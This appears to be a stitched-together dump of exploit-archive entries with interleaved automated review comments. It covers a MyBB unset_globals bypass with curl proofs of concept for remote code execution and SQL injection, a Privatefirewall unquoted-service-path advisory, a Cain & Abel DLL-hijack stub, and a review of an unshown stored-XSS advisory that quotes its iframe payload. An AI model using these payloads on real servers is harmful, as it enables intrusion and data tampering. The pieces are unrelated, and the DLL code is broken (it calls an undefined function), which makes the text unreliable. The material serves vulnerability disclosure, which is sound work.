Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
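Review bot: the advisory contradicts its own metadata and publishes live session cookies. The CVSS score is 3.1 in the header and in Security Risk but 3.2 in Technical Details ("a cvss ... count of 3.2"); the Release Date is 2014-11-07 while the Disclosure Timeline says 2014-11-05; settle both. The PoC session log reproduces the researcher's `PHPSESSID`, `wordpress_sec_*` and `wordpress_logged_in_*` cookie values in full; redact them, since the POST body is what demonstrates the bug. The title "Persistent UI Vulnerability" should name the class: the POST data shows the same stored script payload (`"><iframe src=a onload=alert("VL") <`) accepted in `setting_shopdata[blogname]`, `[blogdescription]`, `[shopdesc]` and `[shoptags]`, i.e. stored XSS reachable by any user who can edit shop settings, and the Vulnerable Parameter(s) list should use those actual field names rather than "blog/shop slogan" and "tags". The vendor-quote paragraph also reads "You have to be an expert to work with the SUPR Shop", which in context looks like a dropped negation; check against the quoted page.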

platforms/php/webapps/35323.md Executable file
@ -0,0 +1,304 @@
# Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote
Code Execution Vulnerability
# Date: 2014-11-21
# Exploit Author: Taoguang Chen
# Vendor Homepage: twitter.com/chtg57
# Software Link: www.mybb.com
# Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
MyBB had released 1.8.3 and 1.6.16 to fixed this vulnerability.
Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e
#MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability
Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06
> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.
##I. MyBB's unset_globals() Function Bypass
When PHP's register\_globals configuration set on, MyBB will call unset\_globals() function, all global variables registered by PHP from $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed.
```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
}
}
```
But unset\_globals() function can be bypassed.
###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed
```
foo.php?_COOKIE=1
// $_GET['_COOKIE']
```
When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy $GLOBALS['\_COOKIE'].
```
$this->unset_globals($_GET);
...
}
...
function unset_globals($array)
{
...
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
```
This means $\_COOKIE array will be destroyed. This also means all global variables registered by PHP from $\_COOKIE array will be destroyed because them will not be handled by unset().
```
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
```
By the same token, if $\_GET or $\_FILES array was destroyed via unset\_globals(), the corresponding global variables registered by PHP will not be destroyed.
###ii) $GLOBALS Array was Destroyed
```
foo.php?GLOBALS=1
// $_GET['GLOBALS']
```
When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy $GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.
$GLOBALS array is a automatic global variable, and binding with global symbol table, you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because $GLOBALS array has been destroyed. This also means all variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays will not be destroyed.
By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS array, then the corresponding global variables registered by PHP will not be destroyed.
In fact, MyBB is already aware of the problem:
```
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
foreach($protected as $var)
{
if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
{
die("Hacking attempt");
}
}
```
Unfortunately, there is a small hole yet:-)
$\_REQUEST is an associative array that by default contains mix of $\_GET, $\_POST, and $\_COOKIE arrays data.
But PHP >= 5.3 introduced request\_order configuration, the directive affects the contents of $\_REQUEST array.
```
request_order = "GP"
```
This is recommended setting in php.ini. Set it to "GP" means only $\_GET and $\_POST arrays data is merged into $\_REQUEST array without $\_COOKIE array data.
So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass unset\_globals() function in PHP 5.3.
##II. Remote Code Execution Vulnerability
There is one interesting method in MyBB:
```
class MyBB {
...
function __destruct()
{
// Run shutdown function
if(function_exists("run_shutdown"))
{
run_shutdown();
}
}
}
```
Look into run\_shutdown() function:
```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// Run any shutdown functions if we have them
if(is_array($shutdown_functions))
{
foreach($shutdown_functions as $function)
{
call_user_func_array($function['function'], $function['arguments']);
}
}
$done_shutdown = true;
}
```
The $shutdown\_functions was initialized via add\_shutdown() function in init.php:
```
// Set up any shutdown functions we need to run globally
add_shutdown('send_mail_queue');
```
But add\_shutdown() function initialization handler is wrong:
```
function add_shutdown($name, $arguments=array())
{
global $shutdown_functions;
if(!is_array($shutdown_functions))
{
$shutdown_functions = array();
}
if(!is_array($arguments))
{
$arguments = array($arguments);
}
if(is_array($name) && method_exists($name[0], $name[1]))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}
else if(!is_array($name) && function_exists($name))
{
$shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
return true;
}
return false;
}
```
In the above code we see that run\_shutdown() function is vulnerable because $shutdown\_functions is initialized correctly and therefore result in arbitrary code execution.
##III. Proof of Concept
When request\_order = "GP" and register\_globals = On, remote code execution by just using curl on the command line:
```
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/
```
##IV. P.S.I
**Another case to exploit the vulnerability:**
When PHP's "disable\_functions" configuration directive disable ini\_get() function:
```
disable_functions = ini_get
```
The unset\_globals() function will not be called that regardless of register\_globals set on or off.
```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
```
**Proof of Concept**
Works on disable\_functions = ini\_get and register\_globals = On:
```
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```
##V. P.S.II
**SQL injection vulnerability via run\_shutdown() function**
```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// We have some shutdown queries needing to be run
if(is_array($shutdown_queries))
{
// Loop through and run them all
foreach($shutdown_queries as $query)
{
$db->query($query);
}
}
```
The $shutdown\_queries was initialized in global.php:
```
$shutdown_queries = array();
```
But not all files are included global.php, such as css.php:
```
require_once "./inc/init.php";
```
There is not included global.php, and $shutdown\_queries is uninitialized, with the result that there is a SQL injection vulnerability.
**Proof of Concept**
Works on request\_order = "GP" and register\_globals = On:
```
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php
```
Works on disable\_functions = ini\_get and register\_globals = On:
```
css.php?shutdown_queries[]=SQL_Inj
```
##VI. Disclosure Timeline
* 2014.03.06 - Notified the MyBB devs via security contact form
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
* 2014.11.21 - Public Disclosure
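Review bot: the conclusion "run_shutdown() function is vulnerable because $shutdown_functions is initialized correctly" contradicts the sentence introducing the add_shutdown() listing ("add_shutdown() function initialization handler is wrong") and should say the opposite: add_shutdown() only executes `$shutdown_functions = array();` when the global is not already an array, so a value that register_globals has already placed in that global before init.php runs is kept and later handed to call_user_func_array(); the same pattern explains the $shutdown_queries case in css.php, where the `$shutdown_queries = array();` line from global.php is never reached. Two smaller points: "$\_FLIES['GLOBALS']" in the $GLOBALS paragraph should read "$\_FILES['GLOBALS']", and since every proof of concept in the file requires register_globals = On, the preconditions should state plainly that the issue applies to PHP 5.3 only (register_globals was removed in PHP 5.4), so an administrator can judge exposure from the preconditions alone; the natural fix the listings point to is initializing $shutdown_functions and $shutdown_queries unconditionally in init.php instead of relying on unset_globals() to clean the globals.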

View file

@ -0,0 +1,68 @@
Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation
Vendor: PWI, Inc.
Product web page: http://www.privacyware.com
Affected version: 7.0.30.3
Summary: Privatefirewall multi-layered endpoint security software protects
32 and 64 bit Windows desktops and servers from malware and unauthorized use.
Personal firewall, packet inspection, URL filtering, anti-logger, process
monitor, and application/system behavior modeling and anomaly detection
components stop hackers, spyware, viruses and other forms of malware before
they can cause damage.
Desc: Privatefirewall suffers from an unquoted search path issue impacting
the Core Service 'PFNet' service for Windows deployed as part of Privatefirewall
bundle. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user?s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5209
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5209.php
09.11.2014
---
C:\Users\user>sc qc PFNet
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PFNet
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
LOAD_ORDER_GROUP : TDI
TAG : 0
DISPLAY_NAME : Privacyware network service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
--
C:\Users\user>icacls "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe"
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
--
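Review bot: the icacls output at the end of the hunk only shows the ACL on pfsvc.exe itself (BUILTIN\Users have RX, not write access), which does not demonstrate the precondition stated in the Desc paragraph, namely that a non-privileged local user can place a file on one of the directories Windows searches before resolving the unquoted BINARY_PATH_NAME; to support the severity claim, add the icacls output for those directory components (C:\, C:\Program Files (x86)\, C:\Program Files (x86)\Privacyware\) or state explicitly that they are write-restricted by default, since on a default install that is what decides whether this is exploitable at all. The remediation worth naming for readers is to quote the service image path so that BINARY_PATH_NAME reads "C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe" including the surrounding quotes, which removes the ambiguity entirely; the same `sc qc` output used here is also the detection check, as any BINARY_PATH_NAME that contains spaces and does not begin with a quote is affected. Minor: "local user?s code" in the Desc paragraph has a mis-encoded apostrophe.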

View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/46239/info
Cain & Abel is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Cain & Abel 2.7.3 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int pwnme()
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
exit(0);
return 0;
}